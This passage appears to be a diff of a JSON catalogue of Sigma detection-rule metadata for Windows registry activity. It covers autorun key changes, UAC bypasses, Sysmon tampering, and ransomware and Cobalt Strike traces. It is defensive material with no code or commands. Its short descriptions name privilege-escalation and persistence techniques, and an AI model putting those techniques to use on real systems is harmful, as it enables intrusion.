"author": "frack113", - "creation_date": "2022/08/19", - "falsepositive": [ - "Legitmate use of the feature (alerts should be investigated either way)" - ], - "filename": "registry_set_allow_rdp_remote_assistance_feature.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", - "value": "Allow RDP Remote Assistance Feature" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_classes.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "9df5f547-c86a-433e-b533-f2794357e242", - "value": "Classes Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", - "creation_date": "2019/10/25", - "falsepositive": 
[ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_common.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://persistence-info.github.io/Data/userinitmprlogonscript.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", - "value": "Common Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "f674e36a-4b91-431e-8aef-f8a96c2aca35", - "value": "CurrentControlSet Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_currentversion.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", - "value": "CurrentVersion Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - 
"Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "cbf93e5d-ca6c-4722-8bea-e9119007c248", - "value": "CurrentVersion NT Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "a80f662f-022f-4429-9b8c-b1a41aaa6688", - "value": "Internet Explorer Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_office.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "baecf8fb-edbf-429f-9ade-31fc3f22b970", - "value": "Office Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - 
"Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_session_manager.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001", - "attack.t1546.009" - ] - }, - "uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298", - "value": "Session Manager Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" - ], - "tags": [ - 
"attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", - "value": "System Scripts Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_winsock2.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", - "value": "WinSock2 Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml", - "level": 
"medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", - "value": "Wow6432Node CurrentVersion Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": 
"18f2065c-d36c-464a-a748-bcf909acb2e3", - "value": "Wow6432Node Classes Autorun Keys Modification" - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "480421f9-417f-4d3b-9552-fd2728443ec8", - "value": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification" - }, - { - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "meta": { - "author": "frack113", - "creation_date": "2022/01/24", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_blackbyte_ransomware.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", - 
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "83314318-052a-4c90-a1ad-660ece38d276", - "value": "Blackbyte Ransomware Registry" - }, - { - "description": "Bypasses User Account Control using a fileless method", - "meta": { - "author": "frack113", - "creation_date": "2022/01/05", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", - "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ] - }, - "uuid": "46dd5308-4572-4d12-aa43-8938f0184d4f", - "value": "Bypass UAC Using DelegateExecute" - }, - { - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", - "meta": { - "author": "frack113", - "creation_date": "2022/01/05", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.010" - ] - }, - "uuid": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", - "value": "Bypass UAC Using Event Viewer" - }, - { - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", - "meta": { - "author": "frack113", - "creation_date": "2022/01/06", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", - "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ] - }, - "uuid": "724ea201-6514-4f38-9739-e5973c34f49a", - "value": "Bypass UAC Using SilentCleanup Task" - }, - { - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/01", - "falsepositive": [ 
- "Unknown" - ], - "filename": "registry_set_change_rdp_port.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.010" - ] - }, - "uuid": "509e84b9-a71a-40e0-834f-05470369bd1e", - "value": "Changing RDP Port to Non Standard Number" - }, - { - "description": "Hides the file extension through modification of the registry", - "meta": { - "author": "frack113", - "creation_date": "2022/01/22", - "falsepositive": [ - "Administrative scripts" - ], - "filename": "registry_set_change_security_zones.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", - "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137" - ] - }, - "uuid": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", - "value": "IE Change Domain Zone" - }, - { - "description": "Detects changes in Sysmon driver altitude. 
If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "meta": { - "author": "B.Talebi", - "creation_date": "2022/07/28", - "falsepositive": [ - "Legitimate driver altitude change to hide sysmon" - ], - "filename": "registry_set_change_sysmon_driver_altitude.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650", - "https://youtu.be/zSihR3lTf7g", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "value": "Disable Sysmon Event Logging Via Registry" - }, - { - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "meta": { - "author": "frack113", - "creation_date": "2022/09/17", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_change_winevt_channelaccess.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", - "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", - "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ] - }, - "uuid": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "value": "Change Winevt Event Access Permission Via Registry" - }, - { - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "meta": { - 
"author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_chm_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/htmlhelpauthor.html", - "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chm_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b", - "value": "CHM Helper DLL Persistence" - }, - { - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "meta": { - "author": "frack113", - "creation_date": "2021/12/28", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_chrome_extension.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1133" - ] - }, - "uuid": "b64a026b-8deb-4c1d-92fd-98893209dff1", - "value": "Running Chrome VPN Extensions via the Registry 2 VPN Extension" - }, - { - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule 
is based on a regular sysmon's events.\n", - "meta": { - "author": "Wojciech Lesicki", - "creation_date": "2021/06/29", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_cobaltstrike_service_installs.yml", - "level": "critical", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" - ] - }, - "uuid": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "value": "CobaltStrike Service Installations in Registry" - }, - { - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "meta": { - "author": "Omkar Gudhate", - "creation_date": "2020/09/27", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_comhijack_sdclt.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass", - "https://www.exploit-db.com/exploits/47696", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" - ] - }, - "uuid": "07743f65-7ec9-404a-a519-913db7118a8d", - "value": "COM Hijack via Sdclt" - }, - { - "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", - "meta": { - "author": "Tobias Michalski", - "creation_date": "2022/02/24", - "falsepositive": [ - "Legitimate disabling of crashdumps" - ], - "filename": "registry_set_crashdump_disabled.yml", - "level": "medium", - "logsource.category": "registry_set", - 
"logsource.product": "windows", - "refs": [ - "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml" - ], - "tags": [ - "attack.t1564", - "attack.t1112" - ] - }, - "uuid": "2ff692c2-4594-41ec-8fcb-46587de769e0", - "value": "CrashControl CrashDump Disabled" - }, - { - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "meta": { - "author": "Florian Roth, frack113", - "creation_date": "2022/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_creation_service_susp_folder.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", - "value": "Service Binary in Suspicious Folder" - }, - { - "description": "Detect the creation of a service with a service binary located in a uncommon directory", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_creation_service_uncommon_folder.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": 
